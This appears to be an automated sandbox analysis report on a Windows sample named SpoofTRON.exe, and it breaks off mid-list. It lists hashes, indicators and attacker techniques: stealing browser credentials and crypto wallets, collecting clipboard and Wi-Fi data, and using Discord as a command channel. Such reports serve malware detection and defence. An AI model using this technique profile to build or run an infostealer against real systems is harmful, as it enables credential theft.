Analysis
-
max time kernel
906s -
max time network
902s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-11-2024 06:51
Behavioral task
behavioral1
Sample
SPOOFtron/Driver/SPOOFTRONDriver.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
SPOOFtron/SpoofTRON.exe
Resource
win11-20241007-en
General
-
Target
SPOOFtron/SpoofTRON.exe
-
Size
21.0MB
-
MD5
c67ed44f13abd015012b670b44f33976
-
SHA1
2b33db325c4643309e97b71f5b9eef1f020b20e8
-
SHA256
f88a3d60549f5a5e789c06ad0b647807de4c48d7173472e51a314b95df2c7a29
-
SHA512
85b6c7381e3d984416747b85989e4723252a89e775925ce64f3e12adc1ca972ac90b30c1e9a8ac7a53b4413d2c936966592f8c624b2caad2762a22863c38a30d
-
SSDEEP
98304:83DjWM8JEE1FMCamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIFR:830oeNTfm/pf+xk4dWRpmrbW3jmr
Malware Config
Signatures
-
pid Process 4004 powershell.exe 4872 powershell.exe 4920 powershell.exe 1200 powershell.exe 3736 powershell.exe 2760 powershell.exe 3972 powershell.exe 860 powershell.exe 5412 powershell.exe 2988 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts SpoofTRON.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts DNSMix.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2180 cmd.exe 3840 powershell.exe 1280 cmd.exe 3580 powershell.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 8 IoCs
pid Process 2516 rar.exe 2780 winrar-x64-701.exe 5780 winrar-x64-701.exe 2528 7z2408-x64.exe 3044 7zG.exe 1940 DNSMix.exe 3784 DNSMix.exe 1440 rar.exe -
Loads dropped DLL 35 IoCs
pid Process 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 2000 SpoofTRON.exe 3348 Process not Found 3044 7zG.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe 3784 DNSMix.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 5 discord.com 6 discord.com 112 discord.com 118 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com 108 ip-api.com 112 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 10 IoCs
pid Process 1492 tasklist.exe 1776 tasklist.exe 3764 tasklist.exe 4520 tasklist.exe 2692 tasklist.exe 3372 tasklist.exe 4820 tasklist.exe 5972 tasklist.exe 3916 tasklist.exe 5908 tasklist.exe -
resource yara_rule behavioral2/files/0x001900000002aad3-21.dat upx behavioral2/memory/2000-25-0x00007FF846C10000-0x00007FF8471F8000-memory.dmp upx behavioral2/files/0x001900000002aac1-27.dat upx behavioral2/memory/2000-29-0x00007FF85C990000-0x00007FF85C9B4000-memory.dmp upx behavioral2/files/0x001900000002aad1-31.dat upx behavioral2/files/0x001900000002aace-34.dat upx behavioral2/files/0x001900000002aacb-48.dat upx behavioral2/files/0x001900000002aac8-47.dat upx behavioral2/files/0x001900000002aac7-46.dat upx behavioral2/files/0x001900000002aac5-45.dat upx behavioral2/files/0x001900000002aac4-44.dat upx behavioral2/files/0x001900000002aac3-43.dat upx behavioral2/files/0x001900000002aac2-42.dat upx behavioral2/files/0x001900000002aac0-41.dat upx behavioral2/files/0x004600000002aada-40.dat upx behavioral2/files/0x001900000002aad9-39.dat upx behavioral2/files/0x001c00000002aad8-38.dat upx behavioral2/files/0x001c00000002aad2-35.dat upx behavioral2/memory/2000-32-0x00007FF85E7C0000-0x00007FF85E7CF000-memory.dmp upx behavioral2/memory/2000-54-0x00007FF85B940000-0x00007FF85B96D000-memory.dmp upx behavioral2/memory/2000-58-0x00007FF85B8F0000-0x00007FF85B913000-memory.dmp upx behavioral2/memory/2000-56-0x00007FF85B920000-0x00007FF85B939000-memory.dmp upx behavioral2/memory/2000-60-0x00007FF858700000-0x00007FF858873000-memory.dmp upx behavioral2/memory/2000-64-0x00007FF85B8C0000-0x00007FF85B8CD000-memory.dmp upx behavioral2/memory/2000-66-0x00007FF85B890000-0x00007FF85B8BE000-memory.dmp upx behavioral2/memory/2000-62-0x00007FF85B8D0000-0x00007FF85B8E9000-memory.dmp upx behavioral2/memory/2000-74-0x00007FF85C990000-0x00007FF85C9B4000-memory.dmp upx behavioral2/memory/2000-73-0x00007FF8536F0000-0x00007FF853A65000-memory.dmp upx behavioral2/memory/2000-79-0x00007FF85B750000-0x00007FF85B75D000-memory.dmp upx behavioral2/memory/2000-78-0x00007FF85B940000-0x00007FF85B96D000-memory.dmp upx behavioral2/memory/2000-76-0x00007FF85B840000-0x00007FF85B854000-memory.dmp upx behavioral2/memory/2000-81-0x00007FF85B920000-0x00007FF85B939000-memory.dmp upx behavioral2/memory/2000-82-0x00007FF857CF0000-0x00007FF857E0C000-memory.dmp upx behavioral2/memory/2000-71-0x00007FF8580D0000-0x00007FF858188000-memory.dmp upx behavioral2/memory/2000-70-0x00007FF846C10000-0x00007FF8471F8000-memory.dmp upx behavioral2/memory/2000-106-0x00007FF85B8F0000-0x00007FF85B913000-memory.dmp upx behavioral2/memory/2000-182-0x00007FF858700000-0x00007FF858873000-memory.dmp upx behavioral2/memory/2000-252-0x00007FF85B8D0000-0x00007FF85B8E9000-memory.dmp upx behavioral2/memory/2000-266-0x00007FF85B890000-0x00007FF85B8BE000-memory.dmp upx behavioral2/memory/2000-280-0x00007FF8580D0000-0x00007FF858188000-memory.dmp upx behavioral2/memory/2000-300-0x00007FF8536F0000-0x00007FF853A65000-memory.dmp upx behavioral2/memory/2000-302-0x00007FF846C10000-0x00007FF8471F8000-memory.dmp upx behavioral2/memory/2000-308-0x00007FF858700000-0x00007FF858873000-memory.dmp upx behavioral2/memory/2000-303-0x00007FF85C990000-0x00007FF85C9B4000-memory.dmp upx behavioral2/memory/2000-317-0x00007FF846C10000-0x00007FF8471F8000-memory.dmp upx behavioral2/memory/2000-332-0x00007FF846C10000-0x00007FF8471F8000-memory.dmp upx behavioral2/memory/2000-352-0x00007FF85B8F0000-0x00007FF85B913000-memory.dmp upx behavioral2/memory/2000-357-0x00007FF8580D0000-0x00007FF858188000-memory.dmp upx behavioral2/memory/2000-356-0x00007FF85B890000-0x00007FF85B8BE000-memory.dmp upx behavioral2/memory/2000-355-0x00007FF85B8C0000-0x00007FF85B8CD000-memory.dmp upx behavioral2/memory/2000-354-0x00007FF85B8D0000-0x00007FF85B8E9000-memory.dmp upx behavioral2/memory/2000-353-0x00007FF858700000-0x00007FF858873000-memory.dmp upx behavioral2/memory/2000-351-0x00007FF85B920000-0x00007FF85B939000-memory.dmp upx behavioral2/memory/2000-350-0x00007FF85B940000-0x00007FF85B96D000-memory.dmp upx behavioral2/memory/2000-349-0x00007FF85E7C0000-0x00007FF85E7CF000-memory.dmp upx behavioral2/memory/2000-348-0x00007FF85C990000-0x00007FF85C9B4000-memory.dmp upx behavioral2/memory/2000-347-0x00007FF8536F0000-0x00007FF853A65000-memory.dmp upx behavioral2/memory/2000-346-0x00007FF857CF0000-0x00007FF857E0C000-memory.dmp upx behavioral2/memory/2000-345-0x00007FF85B750000-0x00007FF85B75D000-memory.dmp upx behavioral2/memory/2000-344-0x00007FF85B840000-0x00007FF85B854000-memory.dmp upx behavioral2/memory/3784-1380-0x00007FF843260000-0x00007FF843848000-memory.dmp upx behavioral2/memory/3784-1381-0x00007FF858160000-0x00007FF858184000-memory.dmp upx behavioral2/memory/3784-1382-0x00007FF860FD0000-0x00007FF860FDF000-memory.dmp upx behavioral2/memory/3784-1387-0x00007FF858090000-0x00007FF8580BD000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\readme.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7z.dll 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\License.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip.dll 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\7z.exe 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 7z2408-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt 7z2408-x64.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\winrar-x64-701.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\7z2408-x64.exe:Zone.Identifier chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FileCoAuth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7z2408-x64.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 964 cmd.exe 1384 netsh.exe 5316 cmd.exe 2056 netsh.exe -
Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2900 WMIC.exe 72 WMIC.exe 3056 WMIC.exe 4464 WMIC.exe 1572 WMIC.exe 5060 WMIC.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 4772 systeminfo.exe 2092 systeminfo.exe -
Kills process with taskkill 18 IoCs
pid Process 3796 taskkill.exe 4124 taskkill.exe 1884 taskkill.exe 4484 taskkill.exe 5064 taskkill.exe 2260 taskkill.exe 3372 taskkill.exe 1220 taskkill.exe 3160 taskkill.exe 5424 taskkill.exe 5956 taskkill.exe 5444 taskkill.exe 4360 taskkill.exe 5212 taskkill.exe 5964 taskkill.exe 4704 taskkill.exe 1200 taskkill.exe 2328 taskkill.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772504031395943" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 26 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2408-x64.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2408-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" 7z2408-x64.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2408-x64.exe -
NTFS ADS 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\DNSmix.rar:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\spoofTRON.rar:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\winrar-x64-701.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\7z2408-x64.exe:Zone.Identifier chrome.exe -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 3972 powershell.exe 4004 powershell.exe 3972 powershell.exe 4004 powershell.exe 860 powershell.exe 860 powershell.exe 3840 powershell.exe 3840 powershell.exe 3840 powershell.exe 2088 powershell.exe 2088 powershell.exe 2088 powershell.exe 4872 powershell.exe 4872 powershell.exe 1476 powershell.exe 1476 powershell.exe 4920 powershell.exe 4920 powershell.exe 4388 powershell.exe 4388 powershell.exe 1920 chrome.exe 1920 chrome.exe 5568 chrome.exe 5568 chrome.exe 5568 chrome.exe 5568 chrome.exe 2992 chrome.exe 2992 chrome.exe 856 chrome.exe 856 chrome.exe 856 chrome.exe 856 chrome.exe 5412 powershell.exe 5412 powershell.exe 1200 powershell.exe 1200 powershell.exe 1200 powershell.exe 5412 powershell.exe 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe 3580 powershell.exe 3580 powershell.exe 5032 powershell.exe 5032 powershell.exe 3580 powershell.exe 5032 powershell.exe 3736 powershell.exe 3736 powershell.exe 3100 powershell.exe 3100 powershell.exe 2760 powershell.exe 2760 powershell.exe 5508 powershell.exe 5508 powershell.exe 5508 powershell.exe 2176 chrome.exe 2176 chrome.exe 4112 chrome.exe 4112 chrome.exe 4112 chrome.exe 4112 chrome.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 4 Process not Found 676 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
pid Process 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 1920 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2992 chrome.exe 2176 chrome.exe 2176 chrome.exe 2176 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1492 tasklist.exe Token: SeDebugPrivilege 3972 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeIncreaseQuotaPrivilege 2196 WMIC.exe Token: SeSecurityPrivilege 2196 WMIC.exe Token: SeTakeOwnershipPrivilege 2196 WMIC.exe Token: SeLoadDriverPrivilege 2196 WMIC.exe Token: SeSystemProfilePrivilege 2196 WMIC.exe Token: SeSystemtimePrivilege 2196 WMIC.exe Token: SeProfSingleProcessPrivilege 2196 WMIC.exe Token: SeIncBasePriorityPrivilege 2196 WMIC.exe Token: SeCreatePagefilePrivilege 2196 WMIC.exe Token: SeBackupPrivilege 2196 WMIC.exe Token: SeRestorePrivilege 2196 WMIC.exe Token: SeShutdownPrivilege 2196 WMIC.exe Token: SeDebugPrivilege 2196 WMIC.exe Token: SeSystemEnvironmentPrivilege 2196 WMIC.exe Token: SeRemoteShutdownPrivilege 2196 WMIC.exe Token: SeUndockPrivilege 2196 WMIC.exe Token: SeManageVolumePrivilege 2196 WMIC.exe Token: 33 2196 WMIC.exe Token: 34 2196 WMIC.exe Token: 35 2196 WMIC.exe Token: 36 2196 WMIC.exe Token: SeIncreaseQuotaPrivilege 2196 WMIC.exe Token: SeSecurityPrivilege 2196 WMIC.exe Token: SeTakeOwnershipPrivilege 2196 WMIC.exe Token: SeLoadDriverPrivilege 2196 WMIC.exe Token: SeSystemProfilePrivilege 2196 WMIC.exe Token: SeSystemtimePrivilege 2196 WMIC.exe Token: SeProfSingleProcessPrivilege 2196 WMIC.exe Token: SeIncBasePriorityPrivilege 2196 WMIC.exe Token: SeCreatePagefilePrivilege 2196 WMIC.exe Token: SeBackupPrivilege 2196 WMIC.exe Token: SeRestorePrivilege 2196 WMIC.exe Token: SeShutdownPrivilege 2196 WMIC.exe Token: SeDebugPrivilege 2196 WMIC.exe Token: SeSystemEnvironmentPrivilege 2196 WMIC.exe Token: SeRemoteShutdownPrivilege 2196 WMIC.exe Token: SeUndockPrivilege 2196 WMIC.exe Token: SeManageVolumePrivilege 2196 WMIC.exe Token: 33 2196 WMIC.exe Token: 34 2196 WMIC.exe Token: 35 2196 WMIC.exe Token: 36 2196 WMIC.exe Token: SeIncreaseQuotaPrivilege 3056 WMIC.exe Token: SeSecurityPrivilege 3056 WMIC.exe Token: SeTakeOwnershipPrivilege 3056 WMIC.exe Token: SeLoadDriverPrivilege 3056 WMIC.exe Token: SeSystemProfilePrivilege 3056 WMIC.exe Token: SeSystemtimePrivilege 3056 WMIC.exe Token: SeProfSingleProcessPrivilege 3056 WMIC.exe Token: SeIncBasePriorityPrivilege 3056 WMIC.exe Token: SeCreatePagefilePrivilege 3056 WMIC.exe Token: SeBackupPrivilege 3056 WMIC.exe Token: SeRestorePrivilege 3056 WMIC.exe Token: SeShutdownPrivilege 3056 WMIC.exe Token: SeDebugPrivilege 3056 WMIC.exe Token: SeSystemEnvironmentPrivilege 3056 WMIC.exe Token: SeRemoteShutdownPrivilege 3056 WMIC.exe Token: SeUndockPrivilege 3056 WMIC.exe Token: SeManageVolumePrivilege 3056 WMIC.exe Token: 33 3056 WMIC.exe Token: 34 3056 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
